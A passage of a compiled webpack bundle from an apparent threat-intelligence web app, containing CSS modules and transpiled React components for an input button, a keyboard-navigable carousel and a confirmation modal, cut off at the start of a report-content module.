exports.push([module.i, ".InputWithButton__Circle__h45jSa {\n  line-height: 10px;\n}\n.InputWithButton__Circle__h45jSa .InputWithButton__inner__1Hm19L {\n  -webkit-animation: InputWithButton__ts-spin__3KMNWf 400ms infinite linear;\n          animation: InputWithButton__ts-spin__3KMNWf 400ms infinite linear;\n  width: 16px;\n  height: 16px;\n  box-sizing: border-box;\n  border-radius: 50%;\n  border: 2px solid #ccc;\n  border-right-color: #333;\n  display: inline-block;\n  position: relative;\n}\n.InputWithButton__InputWithButton__3-Z2ov {\n  display: flex;\n}\n.InputWithButton__InputWithButton__3-Z2ov .InputWithButton__children__33jWrt {\n  flex-grow: 0;\n  flex-shrink: 0;\n  display: flex;\n  align-items: center;\n  justify-content: center;\n}\n.InputWithButton__InputWithButton__3-Z2ov .InputWithButton__children__33jWrt .InputWithButton__Circle__h45jSa {\n  padding: 0 10px;\n  border-radius: 0 3px 3px 0;\n  background: #ddd;\n  height: 100%;\n  display: flex;\n  align-items: center;\n  justify-content: center;\n}\n.InputWithButton__InputWithButton__3-Z2ov .InputWithButton__children__33jWrt button {\n  border-radius: 0 3px 3px 0;\n  padding: 0 10px;\n  height: 100%;\n}\n.InputWithButton__InputWithButton__3-Z2ov input {\n  border-radius: 3px 0 0 3px;\n  width: 100%;\n  flex: 1 100%;\n}\n.InputWithButton__InputWithButton__3-Z2ov.InputWithButton__disabled__3ulzyq input {\n  background: #f4f4f4;\n  pointer-events: none;\n}\n@-webkit-keyframes InputWithButton__ts-spin__3KMNWf {\n  to {\n    -webkit-transform: rotate(1turn);\n            transform: rotate(1turn);\n  }\n}\n@keyframes InputWithButton__ts-spin__3KMNWf {\n  to {\n    -webkit-transform: rotate(1turn);\n            transform: rotate(1turn);\n  }\n}\n", ""]);

// exports
exports.locals = {
	"Circle": "InputWithButton__Circle__h45jSa",
	"inner": "InputWithButton__inner__1Hm19L",
	"ts-spin": "InputWithButton__ts-spin__3KMNWf",
	"InputWithButton": "InputWithButton__InputWithButton__3-Z2ov",
	"children": "InputWithButton__children__33jWrt",
	"disabled": "InputWithButton__disabled__3ulzyq"
};

/***/ }),
/* 3616 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Carousel */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_prop_types__ = __webpack_require__(16);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_prop_types___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_prop_types__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__Carousel_styl__ = __webpack_require__(3617);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__Carousel_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8__Carousel_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }










var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_8__Carousel_styl___default.a);

var DEFAULT_SLIDE_WIDTH = 540;

var keydown$ = __WEBPACK_IMPORTED_MODULE_5_rxjs__["Observable"].defer(function () {
  return __WEBPACK_IMPORTED_MODULE_5_rxjs__["Observable"].fromEvent(document.body, 'keydown');
});
var arrowLeft$ = keydown$.filter(function (e) {
  return e.key === 'ArrowLeft';
});
var arrowRight$ = keydown$.filter(function (e) {
  return e.key === 'ArrowRight';
});

var PrevButton = function (_React$Component) {
  _inherits(PrevButton, _React$Component);

  function PrevButton() {
    _classCallCheck(this, PrevButton);

    return _possibleConstructorReturn(this, (PrevButton.__proto__ || Object.getPrototypeOf(PrevButton)).apply(this, arguments));
  }

  _createClass(PrevButton, [{
    key: 'componentDidMount',


    // Warn users that onClick will be overwritten
    value: function componentDidMount() {
      if (this.props.onClick) {
        // eslint-disable-line react/prop-types
        console.warn('PrevButton: You passed a value for `onClick` to the Carousel.PrevButton component. It will be ignored.');
      }
    }
  }, {
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */], _extends({ fill: 'none' }, this.props, { onClick: this.context.prev }));
    }
  }]);

  return PrevButton;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

PrevButton.contextTypes = {
  prev: __WEBPACK_IMPORTED_MODULE_1_prop_types__["func"].isRequired
};

var NextButton = function (_React$Component2) {
  _inherits(NextButton, _React$Component2);

  function NextButton() {
    _classCallCheck(this, NextButton);

    return _possibleConstructorReturn(this, (NextButton.__proto__ || Object.getPrototypeOf(NextButton)).apply(this, arguments));
  }

  _createClass(NextButton, [{
    key: 'componentDidMount',


    // Warn users that onClick will be overwritten
    value: function componentDidMount() {
      if (this.props.onClick) {
        // eslint-disable-line react/prop-types
        console.warn('NextButton: You passed a value for `onClick` to the Carousel.NextButton component. It will be ignored.');
      }
    }
  }, {
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */], _extends({ fill: 'none' }, this.props, { onClick: this.context.next }));
    }
  }]);

  return NextButton;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/**
 * NOTE: I didn't export Slide directly in order to emphasize it's relationship
 * to Carousel. They are both needed together and neither is useful without the
 * other, so the Slide is only exposed through the Carousel class.
 */


NextButton.contextTypes = {
  next: __WEBPACK_IMPORTED_MODULE_1_prop_types__["func"].isRequired
};

var Slide = function (_React$Component3) {
  _inherits(Slide, _React$Component3);

  function Slide() {
    _classCallCheck(this, Slide);

    return _possibleConstructorReturn(this, (Slide.__proto__ || Object.getPrototypeOf(Slide)).apply(this, arguments));
  }

  _createClass(Slide, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          style = _props.style,
          width = _props.width;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { style: _extends({}, style, { width: width }), className: cx('Slide') },
        this.props.children
      );
    }
  }]);

  return Slide;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

Slide.defaultProps = {
  style: {}
};


var Carousel = function (_React$Component4) {
  _inherits(Carousel, _React$Component4);

  _createClass(Carousel, [{
    key: 'getChildContext',
    // See NOTE above Slide
    value: function getChildContext() {
      return {
        prev: this.handlePrev,
        next: this.handleNext
      };
    }
  }]);

  function Carousel(props) {
    _classCallCheck(this, Carousel);

    var _this4 = _possibleConstructorReturn(this, (Carousel.__proto__ || Object.getPrototypeOf(Carousel)).call(this, props));

    _this4.state = {
      currentIndex: 0,
      slideWidth: DEFAULT_SLIDE_WIDTH // Just a default. DOM will be measured
    };

    _this4.handlePrev = function () {
      var hasPrev = _this4.state.currentIndex > 0;
      if (hasPrev) {
        _this4.setState({
          currentIndex: _this4.state.currentIndex - 1
        });
      }
    };

    _this4.handleNext = function () {
      var hasNext = _this4.state.currentIndex < _this4.slideCount - 1;
      if (hasNext) {
        _this4.setState({
          currentIndex: _this4.state.currentIndex + 1
        });
      }
    };

    _this4.jumpTo = function (index) {
      return function () {
        _this4.setState({ currentIndex: index });
      };
    };

    if (false) {
      React.Children.forEach(props.children, function (child) {
        if (child.type.displayName !== 'Slide') {
          console.warn('\n            Carousel only accepts children of type Carousel.Slide.\n            Check the constructor of Carousel.js. \u0CA0_\u0CA0\n          ');
        }
      });
    }

    // Not storing this on state because it does not affect render
    _this4.slideCount = __WEBPACK_IMPORTED_MODULE_0_react___default.a.Children.count(props.children);
    return _this4;
  }

  _createClass(Carousel, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      var _this5 = this;

      var slideWidth = Object(__WEBPACK_IMPORTED_MODULE_3_trustar_fp__["IO"])(function () {
        return _this5.slideWindow;
      }).map(function (x) {
        return x.getBoundingClientRect();
      }).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('width'));

      this.sub = __WEBPACK_IMPORTED_MODULE_5_rxjs__["Observable"].merge(arrowLeft$.do(this.handlePrev), arrowRight$.do(this.handleNext)).subscribe();

      this.setState({
        slideWidth: slideWidth.foldOr(function () {
          return _this5.state.slideWidth;
        })
      });
    }
  }, {
    key: 'componentWillUnmount',
    value: function componentWillUnmount() {
      this.sub && this.sub.unsubscribe();
    }
  }, {
    key: 'render',


    /**
     * NOTE: The cloneElement that's going on here is only to pass the measured
     * width of the slides to the slide components themselves. Another way to do
     * this would be with context, but the react docs discourage using context in
     * general but EVEN MORE SO for values that change. Since there's no way to
     * guarantee a child will update in response to context updating. I.e. if
     * there is an intermediate PureComponent or any intermediate component
     * returns false from shouldComponentUpdate.
     */
    value: function render() {
      var _this6 = this;

      var _props2 = this.props,
          children = _props2.children,
          className = _props2.className;
      var currentIndex = this.state.currentIndex;

      var hasNext = currentIndex < this.slideCount - 1;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('Carousel', className) },
        currentIndex > 0 ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["e" /* IconButtonPure */], { fill: 'none', large: true, icon: __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_LEFT, strictStyle: false, onClick: this.handlePrev, className: cx('prev') }) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', { style: { width: 40 } }),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { ref: function ref(el) {
              _this6.slideWindow = el;
            }, className: cx('slideWindow') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            {
              style: {
                width: this.state.slideWidth * this.slideCount,
                transform: 'translateX(-' + this.state.currentIndex * this.state.slideWidth + 'px)'
              },
              className: cx('slides') },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.Children.map(children, function (child) {
              return __WEBPACK_IMPORTED_MODULE_0_react___default.a.cloneElement(child, { width: _this6.state.slideWidth });
            })
          )
        ),
        hasNext && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["e" /* IconButtonPure */], { fill: 'none', large: true, icon: __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_RIGHT, strictStyle: false, onClick: this.handleNext, className: cx('prev') }),
        this.props.withPaginator && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('dots') },
          Array(this.slideCount).fill(null).map(function (_, i) {
            return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('span', {
              key: i,
              className: cx('dot', {
                active: _this6.state.currentIndex === i
              }),
              onClick: _this6.jumpTo(i)
            });
          })
        )
      );
    }
  }]);

  return Carousel;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);
Carousel.Slide = Slide;
Carousel.PrevButton = PrevButton;
Carousel.NextButton = NextButton;
Carousel.defaultProps = {
  withPaginator: false
};
Carousel.childContextTypes = {
  prev: __WEBPACK_IMPORTED_MODULE_1_prop_types__["func"].isRequired,
  next: __WEBPACK_IMPORTED_MODULE_1_prop_types__["func"].isRequired
};

/***/ }),
/* 3617 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3618);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Carousel.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Carousel.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3618 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".Carousel__Carousel__1lWvSO {\n  z-index: 80;\n  box-shadow: 0 0 20px rgba(0,0,0,0.8);\n  position: fixed;\n  top: 15%;\n  bottom: 15%;\n  left: 50%;\n  -webkit-transform: translateX(-50%);\n          transform: translateX(-50%);\n  width: 620px;\n  border-radius: 3px;\n  background: #fff;\n  border: 1px solid #ddd;\n  color: #4a4a4a;\n  display: flex;\n}\n.Carousel__slideWindow__25Z_aY {\n  flex: 1 100%;\n  overflow: hidden;\n}\n.Carousel__slides__1MvTS0 {\n  width: auto;\n  height: 100%;\n  display: flex;\n  flex-direction: row;\n  transition: -webkit-transform 0.6s cubic-bezier(0, 0, 0.25, 1);\n  transition: transform 0.6s cubic-bezier(0, 0, 0.25, 1);\n  transition: transform 0.6s cubic-bezier(0, 0, 0.25, 1), -webkit-transform 0.6s cubic-bezier(0, 0, 0.25, 1);\n  -webkit-transform: translateX(0px);\n          transform: translateX(0px);\n}\n.Carousel__Slide__32HTfD {\n  padding: 10px;\n  overflow: auto;\n}\n.Carousel__dots__31aBnv {\n  position: absolute;\n  bottom: 10px;\n  left: 50%;\n  -webkit-transform: translateX(-50%);\n          transform: translateX(-50%);\n}\n.Carousel__prev__3M9YzT,\n.Carousel__next__3RoYjE {\n  flex-grow: 0;\n  flex-shrink: 0;\n  width: 40px;\n  text-align: center;\n  font-size: 32px;\n  background: transparent;\n  transition: all 0.2s ease-out;\n  cursor: pointer;\n  color: rgba(0,0,0,0.5);\n}\n.Carousel__prev__3M9YzT:hover,\n.Carousel__next__3RoYjE:hover {\n  background: rgba(0,0,0,0.05);\n  color: #4a4a4a;\n}\n.Carousel__dot__276-e6 {\n  background: rgba(0,0,0,0.3);\n  width: 12px;\n  height: 12px;\n  border-radius: 12px;\n  display: inline-block;\n  cursor: pointer;\n}\n.Carousel__dot__276-e6:hover {\n  background: rgba(0,0,0,0.6);\n}\n.Carousel__dot__276-e6:not(:last-child) {\n  margin-right: 10px;\n}\n.Carousel__dot__276-e6.Carousel__active__2ItX7A {\n  background-color: rgba(0,170,170,0.6);\n}\n.dark .Carousel__Carousel__1lWvSO {\n  background: #1d3a59;\n  background: #121d2d;\n  border-color: #626262;\n  color: #fff;\n  box-shadow: 0 0 20px #051b33;\n}\n.dark .Carousel__prev__3M9YzT,\n.dark .Carousel__next__3RoYjE {\n  color: rgba(255,255,255,0.5);\n}\n.dark .Carousel__prev__3M9YzT:hover,\n.dark .Carousel__next__3RoYjE:hover {\n  background: rgba(255,255,255,0.05);\n  color: #fff;\n}\n", ""]);

// exports
exports.locals = {
	"Carousel": "Carousel__Carousel__1lWvSO",
	"slideWindow": "Carousel__slideWindow__25Z_aY",
	"slides": "Carousel__slides__1MvTS0",
	"Slide": "Carousel__Slide__32HTfD",
	"dots": "Carousel__dots__31aBnv",
	"prev": "Carousel__prev__3M9YzT",
	"next": "Carousel__next__3RoYjE",
	"dot": "Carousel__dot__276-e6",
	"active": "Carousel__active__2ItX7A"
};

/***/ }),
/* 3619 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ConfirmationModal; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__ConfirmationModal_styl__ = __webpack_require__(3620);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__ConfirmationModal_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4__ConfirmationModal_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_app__ = __webpack_require__(179);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__ = __webpack_require__(96);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _class, _temp2;

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }








var cx = __WEBPACK_IMPORTED_MODULE_3_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_4__ConfirmationModal_styl___default.a);



var keydown$ = __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].defer(function () {
  return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].fromEvent(document.body, 'keydown');
});
var enterKey$ = keydown$.filter(function (e) {
  return e.key === 'Enter';
});
var escapeKey$ = keydown$.filter(function (e) {
  return e.key === 'Escape';
});

var ConfirmationModal = Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(function (state) {
  return { data: __WEBPACK_IMPORTED_MODULE_5_modules_app__["getters"].confirmation(state) };
}, { confirm: __WEBPACK_IMPORTED_MODULE_5_modules_app__["actions"].confirm })((_temp2 = _class = function (_React$Component) {
  _inherits(_class, _React$Component);

  function _class() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, _class);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = _class.__proto__ || Object.getPrototypeOf(_class)).call.apply(_ref, [this].concat(args))), _this), _this.filter = function () {
      return !!_this.props.data.get('visible');
    }, _this.confirm = function () {
      /* Run whatever accept callback is attached to the current confirmation */
      var accept = _this.props.data.get('accept');
      _this.props.confirm({ visible: false }); // close modal first, in case next accept triggers another confirmation
      accept();
    }, _this.reject = function () {
      _this.props.confirm({ visible: false });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(_class, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      /* Filter only the key events that occur when this component is visible,
       * and prevent default so event doesn't propagate up */
      this.sub = __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].merge(enterKey$.filter(this.filter).do(function (e) {
        return e.preventDefault();
      }).do(this.confirm), escapeKey$.filter(this.filter).do(function (e) {
        return e.preventDefault();
      }).do(this.reject)).subscribe();
    }
  }, {
    key: 'render',
    value: function render() {
      var data = this.props.data;

      var active = data.get('visible');
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('ConfirmationDialog', { active: active }) },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('dialog', { active: active }) },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'h5',
            null,
            data.get('message')
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { className: cx('controls') },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */],
              { fill: 'none', className: cx('cancelButton'), onClick: this.reject },
              'No, cancel'
            ),
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */],
              {
                className: 'confirmButton',
                cyid: 'confirmButton',
                onClick: this.confirm
              },
              'Yes, I\'m sure'
            )
          )
        )
      );
    }
  }]);

  return _class;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component), _class.displayName = 'Confirmation', _temp2));

/***/ }),
/* 3620 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3621);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./ConfirmationModal.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./ConfirmationModal.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3621 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".ConfirmationModal__ConfirmationDialog__2MoTKo {\n  z-index: 10000;\n  position: absolute;\n  top: 0;\n  right: 0;\n  left: 0;\n  bottom: 0;\n  text-align: center;\n  pointer-events: none;\n  background-color: transparent;\n}\n.ConfirmationModal__ConfirmationDialog__2MoTKo.ConfirmationModal__active__13Dr9n {\n  pointer-events: all;\n  background-color: rgba(2,2,2,0.5);\n  transition: background-color 650ms ease;\n}\n.ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths {\n  opacity: 0;\n  padding: 25px;\n  margin: auto;\n  width: 500px;\n  height: auto;\n  border: 1px solid #010101;\n  background: #fff;\n  color: #050505;\n  -webkit-transform: scale(0.75) translateY(0px);\n          transform: scale(0.75) translateY(0px);\n  transition: all 600ms;\n}\n.ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths h5 {\n  margin: 10px;\n}\n.ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths .ConfirmationModal__controls__3XmaKE {\n  display: flex;\n  justify-content: center;\n}\n.ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths .ConfirmationModal__controls__3XmaKE button {\n  margin: 5px;\n  width: 150px;\n  font-size: 16px;\n  padding: 8px;\n  font-weight: bold;\n}\n.ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths.ConfirmationModal__active__13Dr9n {\n  opacity: 1;\n  -webkit-transform: scale(1) translateY(75px);\n          transform: scale(1) translateY(75px);\n}\n.dark .ConfirmationModal__ConfirmationDialog__2MoTKo {\n  background-color: transparent;\n}\n.dark .ConfirmationModal__ConfirmationDialog__2MoTKo.ConfirmationModal__active__13Dr9n {\n  background-color: rgba(2,2,2,0.5);\n  transition: background-color 650ms ease;\n}\n.dark .ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths {\n  border: 1px solid #464646;\n  background: #1a1c20;\n  color: #f7f7f7;\n}\n.dark .ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths h5 button,\n.dark .ConfirmationModal__ConfirmationDialog__2MoTKo .ConfirmationModal__dialog__25eths .ConfirmationModal__controls__3XmaKE button {\n  color: #fff;\n}\n", ""]);

// exports
exports.locals = {
	"ConfirmationDialog": "ConfirmationModal__ConfirmationDialog__2MoTKo",
	"active": "ConfirmationModal__active__13Dr9n",
	"dialog": "ConfirmationModal__dialog__25eths",
	"controls": "ConfirmationModal__controls__3XmaKE"
};

/***/ }),
/* 3622 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ReportContent; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_memoize__ = __webpack_require__(3623);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_memoize___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_memoize__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__ReportContent_styl__ = __webpack_require__(3624);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__ReportContent_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4__ReportContent_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__ErrorBoundary_js__ = __webpack_require__(1488);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_reports_extraction__ = __webpack_require__(1331);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

